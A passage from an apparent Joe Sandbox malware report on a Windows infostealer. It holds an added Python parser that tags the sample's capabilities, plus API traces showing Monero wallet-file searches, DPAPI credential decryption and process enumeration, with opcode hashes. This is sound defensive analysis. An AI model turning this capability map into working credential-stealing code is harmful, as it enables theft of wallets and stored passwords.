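The three function listings above (recursive file enumeration around \Monero\wallet.keys, DPAPI decryption via CryptUnprotectData, and Toolhelp32 process enumeration compared with StrCmpCA) are the stealer's core capabilities in raw API form. The following is an added example, not Joe Sandbox code or part of the original report: it parses API lines in the exact shape printed here (including the "Part of subcall function" prefix), separates resolved string arguments from pointers and unknowns, and tags capabilities with rule names that are this example's own labels, not Joe Sandbox signature names. The sample lines are copied from this report; the size check on Process32First/Next relies on 0x128 being sizeof(PROCESSENTRY32) for the ANSI struct on 32-bit Windows.

```python
"""Parse the per-function 'APIs' listing of a Joe Sandbox report and tag
stealer capabilities.  Added example, not Joe Sandbox code; the rule names
below are assumptions of this example, not sandbox signature names."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: API lines copied in the shape this report prints them.
SAMPLE_LINES = [
    "• Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\\Monero\\wallet.keys,00950E17), ref: 0094A9C5",
    "• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\\*.*,00950D73), ref: 0093E4A2",
    "• FindNextFileA.KERNEL32(000000FF,?), ref: 0093EBDF",
    "• CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0093C87C",
    "• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00937281",
    "• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009372A4",
    "• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0094961E",
    "• Process32First.KERNEL32(00950ACA,00000128), ref: 00949632",
    "• Process32Next.KERNEL32(00950ACA,00000128), ref: 00949647",
    "• StrCmpCA.SHLWAPI(?,00000000), ref: 0094965C",
]

LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                       # address of the call site
    subcall: Optional[int] = None  # function the call is inlined from, if any

    @property
    def string_args(self) -> List[str]:
        # '?' is an unresolved argument and an 8-digit hex value is a raw
        # immediate/pointer; anything else is a string the sandbox resolved.
        return [a for a in self.args if a != "?" and not HEX_RE.match(a)]


def parse_api_lines(lines) -> List[ApiCall]:
    calls = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # headings such as 'APIs' or 'Strings' are not calls
        args = m.group("args").split(",") if m.group("args") else []
        calls.append(ApiCall(
            api=m.group("api"), module=m.group("mod"), args=args,
            ref=int(m.group("ref"), 16),
            subcall=int(m.group("sub"), 16) if m.group("sub") else None))
    return calls


# Every API in the set must appear for the rule to fire (labels are ours).
RULES = {
    "filesystem-enumeration": {"FindFirstFileA", "FindNextFileA"},
    "process-enumeration": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "dpapi-decryption": {"CryptUnprotectData"},
    "base64-decode": {"CryptStringToBinaryA"},
}


def tag_capabilities(calls: List[ApiCall]) -> List[str]:
    seen = {c.api for c in calls}
    return sorted(name for name, needed in RULES.items() if needed <= seen)


def wallet_paths(calls: List[ApiCall]) -> List[str]:
    # Resolved string arguments that point at wallet files are direct IOCs.
    return sorted({s for c in calls for s in c.string_args if "wallet" in s.lower()})


def toolhelp_is_ansi(calls: List[ApiCall]) -> Optional[bool]:
    # Process32First/Next take dwSize in the second argument; 0x128 (296) is
    # sizeof(PROCESSENTRY32) for the ANSI struct on 32-bit Windows, which is
    # consistent with the szExeFile field being compared with StrCmpCA.
    for c in calls:
        if c.api in ("Process32First", "Process32Next") and len(c.args) >= 2:
            if c.args[1] != "?":
                return int(c.args[1], 16) == 0x128
    return None


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_LINES)
    print("capabilities:", tag_capabilities(parsed))
    print("wallet IOCs:", wallet_paths(parsed))
    print("Toolhelp32 ANSI struct:", toolhelp_is_ansi(parsed))
```

The rules fire on API presence only, so they describe capability rather than intent; the string arguments (here the wallet path and the "\*.*" search mask) are what distinguish a wallet-targeting stealer from a generic directory walker, which is why the parser keeps them separate from pointer values.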
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: *|{$iwk$l|z${r
                              • API String ID: 0-650929242
                              • Opcode ID: 6ffc10f729c74c748951f666281e5fb9ea2c133e7fded20176c57ce260ea3a9a
                              • Instruction ID: 5ca0818b74a443827a1c3ad6a6f8c5f032c7cdc334e9212621cf048faa83929a
                              • Opcode Fuzzy Hash: 6ffc10f729c74c748951f666281e5fb9ea2c133e7fded20176c57ce260ea3a9a
                              • Instruction Fuzzy Hash: 16B208F360C6009FE704AE29EC8567EFBE5EF94320F16893DE6C587744EA3558018697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 8w<$Z/wj$b,wc$].
                              • API String ID: 0-1289586338
                              • Opcode ID: d86ef7619ce821483704d7c63023775cd10ff20c16e27a2ba100638accf53653
                              • Instruction ID: 5f76de008bcf79bd86553fd4e885761b06d9ccf59b83b6f2a920873b92c202f2
                              • Opcode Fuzzy Hash: d86ef7619ce821483704d7c63023775cd10ff20c16e27a2ba100638accf53653
                              • Instruction Fuzzy Hash: 91B2F4F360C2109FE304AE29EC8567AFBE5EF94720F1A893DEAC4C7744E63558418796
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ){$?K~$j=[V$@3
                              • API String ID: 0-1601152389
                              • Opcode ID: e02b345c81b94ae2a3250c07146a119eebb4359f35e54650beb885aa0af152c5
                              • Instruction ID: 1d3d15eb8d1c5d17367aba4903cf6bc5c50bc31abfbe93fcb1d4623d54ea1c11
                              • Opcode Fuzzy Hash: e02b345c81b94ae2a3250c07146a119eebb4359f35e54650beb885aa0af152c5
                              • Instruction Fuzzy Hash: CEB2E5B360C2009FE3046F29EC8567AFBE5EFD4720F1A892DE6C487744EA3558458B97
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: [=~$NZg~$_yO$M]
                              • API String ID: 0-1771313002
                              • Opcode ID: b20f6aa66261e977a300b903d035e3c8f26cfb5a4ec0568ee49ec21b2f4d4bff
                              • Instruction ID: 331c7bb80681941138dcb12ae819d191c6b108f09324c72b2d6a7d6c20144dda
                              • Opcode Fuzzy Hash: b20f6aa66261e977a300b903d035e3c8f26cfb5a4ec0568ee49ec21b2f4d4bff
                              • Instruction Fuzzy Hash: 57A206F360C3049FE304AE29EC8167AFBE5EF94760F1A893DE6C583744E63598058697
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009505B7), ref: 009486CA
                              • Process32First.KERNEL32(?,00000128), ref: 009486DE
                              • Process32Next.KERNEL32(?,00000128), ref: 009486F3
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • CloseHandle.KERNEL32(?), ref: 00948761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 9104d46c94413ac1d4c1d8d41cc6ccf83c48da3b0ed2212f6b78a197fed9ffdb
                              • Instruction ID: c0db3ac61baa30b64ca68c6e47b5f43ad4a5354aa8bf47803390946cb90668b5
                              • Opcode Fuzzy Hash: 9104d46c94413ac1d4c1d8d41cc6ccf83c48da3b0ed2212f6b78a197fed9ffdb
                              • Instruction Fuzzy Hash: 95316B71941218ABDB24DF51CC51FEEB778EB84704F104299F50AA22A0DF306E85CFA2
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00935184,40000001,00000000,00000000,?,00935184), ref: 00948EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 97601dd0a685f10225bba29038192af2bf6f371854db14ff2ee3b09f5f4dbc2b
                              • Instruction ID: b0c454eb43ae3b25a8640a229e100861a52c8778d60d643c63b9d0b6c71a4290
                              • Opcode Fuzzy Hash: 97601dd0a685f10225bba29038192af2bf6f371854db14ff2ee3b09f5f4dbc2b
                              • Instruction Fuzzy Hash: 0F111C74200204BFDB40DF64D884FAF33A9AF89700F109948F9198B250DB75EC85DB61
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00934EEE,00000000,?), ref: 00939B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939B2A
                              • LocalFree.KERNEL32(?,?,?,?,00934EEE,00000000,?), ref: 00939B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: f5d03cb5e82c999d37bb1abdc8ca510c52d1e89205be04f7c72497b58ed44870
                              • Instruction ID: ada1a477b33d44e9f096b0df03390d0c71fe35856911786cf54b31b79b691ccd
                              • Opcode Fuzzy Hash: f5d03cb5e82c999d37bb1abdc8ca510c52d1e89205be04f7c72497b58ed44870
                              • Instruction Fuzzy Hash: 7611A4B4240208EFEB10CF64DC95FAAB7B9FB89700F208058F9199B390C7B5A941CB51
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00950E00,00000000,?), ref: 009479B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009479B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00950E00,00000000,?), ref: 009479C4
                              • wsprintfA.USER32 ref: 009479F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 83085632a9be067845b6fedfaed6945d02e0287bac3202655499e0543bd91c6c
                              • Instruction ID: b6baafa423281266dd58c911bb491aeb1bebb53e08ec9c32764e1daf1d692b32
                              • Opcode Fuzzy Hash: 83085632a9be067845b6fedfaed6945d02e0287bac3202655499e0543bd91c6c
                              • Instruction Fuzzy Hash: B31115B2904118AACB149FC9DD45BBEB7F8EB88B11F14425AF605A2280E6395940CBB1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,010FDD20,00000000,?,00950E10,00000000,?,00000000,00000000), ref: 00947A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00947A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,010FDD20,00000000,?,00950E10,00000000,?,00000000,00000000,?), ref: 00947A7D
                              • wsprintfA.USER32 ref: 00947AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 8f57ae2e6f0dbd163a362fc7fecdea3db1138316b9f3a407beb6b05b16473d8c
                              • Instruction ID: 50b118da1bf3849e81e9c77c857eb64ea3b0c36f2a1756ed2730bec4c5bc88f7
                              • Opcode Fuzzy Hash: 8f57ae2e6f0dbd163a362fc7fecdea3db1138316b9f3a407beb6b05b16473d8c
                              • Instruction Fuzzy Hash: 40118EB1A45218EBEB20CB94DC49FA9B778FB44721F10479AE90A932C0DB745A80CF52
                              APIs
                              • CoCreateInstance.COMBASE(0094E118,00000000,00000001,0094E108,00000000), ref: 00943758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009437B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: f2cd8cf9135928e127acb0a2a1e0a2bffe0319c048805744080278c4cefa9e69
                              • Instruction ID: 6df142c39ae1bf5fd97cedae1a7830ff1e119302c075277727e8e86e7826a7a0
                              • Opcode Fuzzy Hash: f2cd8cf9135928e127acb0a2a1e0a2bffe0319c048805744080278c4cefa9e69
                              • Instruction Fuzzy Hash: EA41F770A40A289FDB24DB58CC94F9BB7B4BB88702F4081D8E608A7290E7716EC5CF50
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00939B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00939BA3
                              • LocalFree.KERNEL32(?), ref: 00939BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: e8f5864e8ce81e3c67c58d0b37cf280dd8987288710cf707516f8777fd57d84e
                              • Instruction ID: e12fd5be5f8dcc40cc8ab34447dca716cd059ff66cd2bb662ef8233937b43672
                              • Opcode Fuzzy Hash: e8f5864e8ce81e3c67c58d0b37cf280dd8987288710cf707516f8777fd57d84e
                              • Instruction Fuzzy Hash: 2611C9B8A00209EFDB04DF94D985AAEB7B9FF88300F104598E915A7394D774AE50CFA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: %.$%.
                              • API String ID: 0-3989853728
                              • Opcode ID: dd1547d14f1aa7ad465938e468224f40e2399520c74fd7f27300f18de8c1aa92
                              • Instruction ID: 0591a0c10303cbcb223566466bc0596e364f9c0b3b24ec136cbeb71d8f27bf41
                              • Opcode Fuzzy Hash: dd1547d14f1aa7ad465938e468224f40e2399520c74fd7f27300f18de8c1aa92
                              • Instruction Fuzzy Hash: 69B2D2F360C6009FE304AE2DEC8567AB7E9EF94720F1A893DE6C5C3744E63598118697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 3eWn$IW~w$IW~w
                              • API String ID: 0-1526076383
                              • Opcode ID: 79c27dd00e6467385fe05ac0cc3f2dd4a9b525e106f21bef8bda2af421a5e8cf
                              • Instruction ID: 1b96b1ad1586a59acdcf1708d3b343c8eb664c733a25809a3f05c3be5e031859
                              • Opcode Fuzzy Hash: 79c27dd00e6467385fe05ac0cc3f2dd4a9b525e106f21bef8bda2af421a5e8cf
                              • Instruction Fuzzy Hash: 9E612AF3A087009FE3056E2DECC576ABBE5EB98320F1A453DEAC4C3740E63598158687
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: NyB_$t=7@
                              • API String ID: 0-2004791706
                              • Opcode ID: fb39e0a886786b86170a539566d6e662c64ed56712c5511bb31ff788f6321552
                              • Instruction ID: dddc5f0b2cf15f6c86afc46cb48ba7bdd0b0f8d5d8c27724a0b659889d8fd0d5
                              • Opcode Fuzzy Hash: fb39e0a886786b86170a539566d6e662c64ed56712c5511bb31ff788f6321552
                              • Instruction Fuzzy Hash: 3672B2F350C2049FE304AF29EC8567AFBE9EF94720F1A492DE6C4C7744E63598418A97
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ;r $pzo
                              • API String ID: 0-4062491179
                              • Opcode ID: 6f641121be52fefb4dff9582d2aca68fd8e838ca96bc1b41f5d4bc77e29a12ec
                              • Instruction ID: 553e4d4881b5c13f7185b77886db7421fde9a944c03075b05e69dba5ffb27cb7
                              • Opcode Fuzzy Hash: 6f641121be52fefb4dff9582d2aca68fd8e838ca96bc1b41f5d4bc77e29a12ec
                              • Instruction Fuzzy Hash: 8B5139F390C2149BE3187E7CDC0577ABBD9EBA4320F1A463DEAC5D3784E93949148686
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009515B8,00950D96), ref: 0093F71E
                              • StrCmpCA.SHLWAPI(?,009515BC), ref: 0093F76F
                              • StrCmpCA.SHLWAPI(?,009515C0), ref: 0093F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0093FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0093FAC3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 1b5a735acfcbc46df1e37348067b782269bf0daed4f33b956026373881603108
                              • Instruction ID: de71c7931a887cc0c4d4e3b569b4ce82406a673e18bab5b0b4ad860d1d09854b
                              • Opcode Fuzzy Hash: 1b5a735acfcbc46df1e37348067b782269bf0daed4f33b956026373881603108
                              • Instruction Fuzzy Hash: 0711813184410DABEB24EBA0DC55FED7378EF90304F4146A9A51A97592EF302B4ACB92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: c,L%
                              • API String ID: 0-776531003
                              • Opcode ID: f59550e1114f2fe89720c3555d580054c7c6cf9b0de58fb0a052c77801382a96
                              • Instruction ID: 36313cfddbcf492c8059afa5cc0cf011cd3156eee67ae44dd226578434f7043c
                              • Opcode Fuzzy Hash: f59550e1114f2fe89720c3555d580054c7c6cf9b0de58fb0a052c77801382a96
                              • Instruction Fuzzy Hash: D35101B390C2049FD348BF28EC8576ABBE5EB94320F16493DE9C9C7744E63599408B87
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: pK5
                              • API String ID: 0-3523557807
                              • Opcode ID: 3e5f3908b98dd88afd54d8fe325b8491ae7dd0fcc8005661a40873088cdd1693
                              • Instruction ID: afe8a0acdf9ff5a39d538849155c1775dc426643b9508a8f3306897cbbdc2aae
                              • Opcode Fuzzy Hash: 3e5f3908b98dd88afd54d8fe325b8491ae7dd0fcc8005661a40873088cdd1693
                              • Instruction Fuzzy Hash: F15118F3E086209FE3046D69DC8576AB7E5EF94320F1B853DDAD893380EA79484487D2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: dHB
                              • API String ID: 0-3280201581
                              • Opcode ID: 234dcc6cb08face2cf22796aefc0055cf7e3b0f880731cfc63718b9fcf56e8e2
                              • Instruction ID: 3f65ab1b0f58168a855d55e793310684c01ae0dbda8f43b5f4188e661d7ad339
                              • Opcode Fuzzy Hash: 234dcc6cb08face2cf22796aefc0055cf7e3b0f880731cfc63718b9fcf56e8e2
                              • Instruction Fuzzy Hash: 534137B39086109FD3086E29DC5577AF7E6EBC4760F168A3DE9C487748DA35584087C2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
